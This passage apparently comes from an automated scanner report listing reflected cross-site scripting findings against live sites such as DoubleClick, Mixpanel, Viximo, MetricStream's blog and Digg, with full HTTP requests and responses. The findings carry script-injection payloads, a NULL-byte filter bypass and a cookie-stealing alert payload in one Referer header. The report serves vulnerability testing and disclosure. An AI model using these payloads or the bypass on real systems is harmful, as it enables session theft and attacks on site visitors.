GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA2b7d2"-alert(1)-"e1bf4c111b8&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4922
Date: Wed, 06 Jul 2011 11:56:01 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
ZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA2b7d2"-alert(1)-"e1bf4c111b8&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42744246");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

2.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e73b5"-alert(1)-"f722fd7d7a6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=le73b5"-alert(1)-"f722fd7d7a6&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:33 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b3c/f/1d6/%2a/k%3B231248095%3B0-0%3B0%3B55400195%3B3454-728/90%3B42236289/42254076/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=le73b5"-alert(1)-"f722fd7d7a6&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhz
...[SNIP]...

2.7. http://adonmax.com/afr.php [campaignid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adonmax.com
Path:	/afr.php

Issue detail

The value of the campaignid request parameter is copied into the HTML document as plain text between tags. The payload d4501<script>alert(1)</script>6546b61c730 was submitted in the campaignid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.comd4501<script>alert(1)</script>6546b61c730 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:19:37 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 384
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.comd4501<script>alert(1)</script>6546b61c730 was not found on this server.</p>
...[SNIP]...

2.8. http://adonmax.com/afr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adonmax.com
Path:	/afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 862c4<script>alert(1)</script>f0820835d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com&862c4<script>alert(1)</script>f0820835d7e=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:19:38 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com&862c4<script>alert(1)</script>f0820835d7e=1 was not found on this server.</p>
...[SNIP]...

2.9. http://adonmax.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adonmax.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2267d<script>alert(1)</script>65805352abf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2267d<script>alert(1)</script>65805352abf HTTP/1.1
Host: adonmax.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:27:41 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 327
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico2267d<script>alert(1)</script>65805352abf was not found on this server.</p>
...[SNIP]...

2.10. http://api.mixpanel.com/track/ [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.mixpanel.com
Path:	/track/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f560e<script>alert(1)</script>a9d72cefb0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyJtcF9icm93c2VyIjogIkNocm9tZSIsIm1wX3BsYXRmb3JtIjogIldpbmRvd3MiLCJtcF9wYWdlIjogImh0dHA6Ly93d3cuYmViby5jb20vIiwidG9rZW4iOiAiOTYxMTBkM2JmZGI3YmM3ZmYwYzNjM2U0MDhkMDIyMmIiLCJ0aW1lIjogMTMwOTk1MTMwNH19&ip=1&callback=mpmetrics.jsonp_callbackf560e<script>alert(1)</script>a9d72cefb0&_=1309951304288 HTTP/1.1
Host: api.mixpanel.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 06 Jul 2011 11:22:11 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Expires: Wed, 06 Jul 2011 11:22:10 GMT
Access-Control-Max-Age: 1728000
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Content-Length: 68

mpmetrics.jsonp_callbackf560e<script>alert(1)</script>a9d72cefb0(1);

2.11. http://api.viximo.com/api/v3/publishers/bebo.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.viximo.com
Path:	/api/v3/publishers/bebo.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f5abb<script>alert(1)</script>769dda3a9be was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v3/publishers/bebo.json?callback=viximo.publisherLoadedf5abb<script>alert(1)</script>769dda3a9be HTTP/1.1
Host: api.viximo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: application/json; charset=utf-8
Date: Wed, 06 Jul 2011 11:22:29 GMT
ETag: "71f99547f2ad6ad86b6f344aad90c979"
Server: nginx/0.7.65
Status: 200 OK
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.00955
Content-Length: 15840
Connection: keep-alive

viximo.publisherLoadedf5abb<script>alert(1)</script>769dda3a9be({body: {"publisher": {"uses_promo_bar": true, "profile_url": "http://www.bebo.com/Profile.jsp?MemberId={{user_id}}", "theme_enabled": true, "uses_gift_wrap": true, "uses_message_center": true, "offer_
...[SNIP]...

2.12. https://blog.metricstream.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://blog.metricstream.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b953d'><script>alert(1)</script>19229b4da23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b953d\'><script>alert(1)</script>19229b4da23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b953d'><script>alert(1)</script>19229b4da23=1 HTTP/1.1
Host: blog.metricstream.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:404-BGD-511&token:_mch-metricstream.com-1309960802844-32266; __utma=216666762.365739093.1309960803.1309960803.1309960803.1; __utmc=216666762; __utmz=216666762.1309960803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216666762.9.10.1309960803

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:46:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: https://blog.metricstream.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32430

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>MetricStream GRC Blog | Governance, Risk, Compliance and Quality Management</title>


<link rel="
...[SNIP]...
<a href='https://blog.metricstream.com/page/2/?b953d\'><script>alert(1)</script>19229b4da23=1' class="inactive">
...[SNIP]...

2.13. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdnt.meteorsolutions.com
Path:	/api/ie8_email

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload da4dd<script>alert(1)</script>e5b77016dd7 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FwwwG2EbeautyofthewebG2EcomG2FG3FfbidG3DNOFBIDG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1da4dd<script>alert(1)</script>e5b77016dd7&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Wed, 06 Jul 2011 15:39:15 GMT
Content-Type: application/javascript
Connection: close
Content-Length: 176
Etag: "169d3f95eedfc376e2b2695425fb43113203fccb"

meteor.json_query_callback({"url": "http://meme.ms/nh", "id": "1da4dd<script>alert(1)</script>e5b77016dd7", "persist": "http://meme.ms/persist?key=oqJAVXXYgcBXJagyM-pE0w"}, 0);

2.14. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdnt.meteorsolutions.com
Path:	/api/ie8_email

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload f6022<script>alert(1)</script>c416b9d548d was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FwwwG2EbeautyofthewebG2EcomG2FG3FfbidG3DNOFBIDG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3Bf6022<script>alert(1)</script>c416b9d548d HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Wed, 06 Jul 2011 15:39:25 GMT
Content-Type: application/javascript
Connection: close
Content-Length: 176
Etag: "fb0e3943f6866607c9d82a370bb7c2e809b158e8"

meteor.json_query_callback({"url": "http://meme.ms/nh", "id": "1", "persist": "http://meme.ms/persist?key=oqJAVXXYgcBXJagyM-pE0w"}, 0);f6022<script>alert(1)</script>c416b9d548d

2.15. http://digg.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2cec"><script>alert(1)</script>5e1f327096a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a2cec"><script>alert(1)</script>5e1f327096a=1 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=2ca757a04da66628966d82294dbe49583144ee4d69a172ca708f21056e34ef90; expires=Thu, 07-Jul-2011 11:37:18 GMT; path=/; domain=digg.com
X-Digg-Time: D=251801 10.2.128.190
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101254

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg - The Latest News Headlines, Videos and Images" href="/?a2cec"><script>alert(1)</script>5e1f327096a=1.rss">
...[SNIP]...

2.16. http://digg.com/ajax/submit/crawl [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/ajax/submit/crawl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00186dc"><script>alert(1)</script>11a0bd260e7 was submitted in the REST URL parameter 1. This input was echoed as 186dc"><script>alert(1)</script>11a0bd260e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax%00186dc"><script>alert(1)</script>11a0bd260e7/submit/crawl HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=408863 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18136

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax%00186dc"><script>alert(1)</script>11a0bd260e7/submit/crawl.rss">
...[SNIP]...

2.17. http://digg.com/ajax/submit/crawl [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/ajax/submit/crawl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002ad4b"><script>alert(1)</script>2bf41c450a6 was submitted in the REST URL parameter 2. This input was echoed as 2ad4b"><script>alert(1)</script>2bf41c450a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /ajax/submit%002ad4b"><script>alert(1)</script>2bf41c450a6/crawl HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=280116 10.2.128.190
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18137

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/submit%002ad4b"><script>alert(1)</script>2bf41c450a6/crawl.rss">
...[SNIP]...

2.18. http://digg.com/ajax/submit/crawl [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/ajax/submit/crawl

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019fdd"><script>alert(1)</script>7a8b0f85e9c was submitted in the REST URL parameter 3. This input was echoed as 19fdd"><script>alert(1)</script>7a8b0f85e9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /ajax/submit/crawl%0019fdd"><script>alert(1)</script>7a8b0f85e9c HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=212072 10.2.128.108
